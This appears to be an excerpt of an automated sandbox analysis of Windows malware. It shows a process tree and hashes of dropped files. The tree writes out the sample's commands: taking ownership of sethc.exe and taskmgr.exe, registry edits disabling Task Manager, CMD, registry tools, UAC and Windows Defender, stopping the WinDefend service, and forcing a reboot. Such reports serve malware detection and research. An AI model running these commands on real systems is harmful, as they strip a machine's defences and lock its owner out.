                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                  PID:4316
                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:3508
                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:3996
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:2752
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Delays execution with timeout.exe
                                                                                                                                                                                                                                          PID:4900
                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:2300
                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:3000
                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:760
                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:3840
                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:3140
                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                                                                      PID:2776
                                                                                                                                                                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                      timeout /t 0
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:1800
                                                                                                                                                                                                                                                      • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                        timeout /t 0
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:1936
                                                                                                                                                                                                                                                        • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                          timeout /t 0
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:1556
                                                                                                                                                                                                                                                          • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 0
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:2560
                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                              PID:1880
                                                                                                                                                                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                              timeout /t 0
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:2720
                                                                                                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                timeout /t 0
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:2696
                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                  PID:788
                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                  timeout /t 0
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:1360
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 0
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:4056
                                                                                                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                    timeout /t 1
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:3108
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f taskmgr.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:2052
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f sethc.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:1824
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "sethc.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:2160
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "taskmgr.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:2504
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f reg.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:2888
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "reg.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:3032
                                                                                                                                                                                                                                                                • C:\Windows\system32\takeown.exe
                                                                                                                                                                                                                                                                  takeown /f regedit.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:3060
                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                  icacls "regedit.exe" /granted "Admin":F
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:3484
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:4260
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4768
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:1936
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2792
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                          • UAC bypass
                                                                                                                                                                                                                                                                          PID:3384
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:1880
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:3520
                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                              reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:4916
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:924
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:3120
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:1416
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:4928
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Modifies system executable filetype association
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:1480
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:3480
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:2288
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                            sc stop WinDefend
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                            PID:4960
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                                            sc config WinDefend start=disabled
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                                                            PID:1216
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\shutdown.exe
                                                                                                                                                                                                                                                                                            shutdown -r -t 0
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:780
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      PID:900
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x00000000000004F0 0x00000000000004E4
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:3400
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa3936055 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:924

                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\69rnspam.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        727793378d36b60cae54319b2f5e9e4d

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        2171ea2f0ea01b39c71ea216a945816fa9ffe751

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\exec.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        90KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        236f1bc0ecb98edb8efdc31da513e819

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        47cc4e73c0f6d717eba708cf468bf6ecb9970086

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\jumpscare.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        5425f894a45d90bac30ff9a34d2ad2f3

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        3d9b9708b4eb917142e7fb59ba61534db2c84e7b

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\killrunas.vbs

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        219B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        fb63b21fb318509a75324b1037da7876

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\logon_overwrte.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        f8df0742068fa14d5a4502de32acf41b

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\rainbow.bat

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        320B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        9d25a94b77c178f0d19bdd8440aaaade

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        c732a091461e0ebbd69f6f64b70016e13856908c

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\rnbowspam.exe

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        e000d863f54529348b39030cbaf19aad

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        9138d2cb83508bf24edee9cb581f60700a1c2b9b

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\tape.mp4

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1.7MB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        3784764b2a5db2e23e744eaff79f40c8

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        33994de53dcf82b834961421b863181763166954

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f

                                                                                                                                                                                                                                                                                      • C:\PerfLogs\windows\warn.vbs

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        209B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        2f1738d26b35388f87f905ecc98cf408

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        f1d20ac33b739f3d50d30891b743ef4374abbc5f

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1024KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        392555a30fb8725db31c677294ee5990

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        c8e83f325b6db18a4a129e95a1842e692a6d7e35

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        7d47273289d34dd052a55ecd9fef4fafcfb6a1577246b462ba8a115ec5f6a697

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        e9c2578cb8d67738b586dcb547b6d0f1bd2250c372d252d46b0e2a6363c5cc9748321ad8a99cf04a30366cf674e98c0e3a94583629039898dd232aadca4d1dae

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        19d78b1eae63fd95e33c36ae0cad7aa8

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        52bbbd1abf5e05fd11b19462a54685e7ccfc2d4b

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        50c2e86388d63a5a5a2052f9866083e8784c3eed266f9b947b4f5772e5fbcf80

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        34d6dd06fc41e2a3bf026cc58e461cf12064eab6969225d118b786aaacfabaac8bd7cbc6c26ad2c985faa04f0a07a4134119d4780c9189ded6db3d0fe9b59454

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        498B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        90be2701c8112bebc6bd58a7de19846e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        a95be407036982392e2e684fb9ff6602ecad6f1e

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        9KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        5433eab10c6b5c6d55b7cbd302426a39

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        c5b1604b3350dab290d081eecd5389a895c58de5

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        9KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        7050d5ae8acfbe560fa11073fef8185d

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        3KB

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        47814c389b7e63ed5a13aa8dcc435f23

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        113B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        5b094d5e0e750e15ab5628f608756249

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        c73caec179b8baf3833413aaab31c384c48ccd45

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f

                                                                                                                                                                                                                                                                                        SHA512

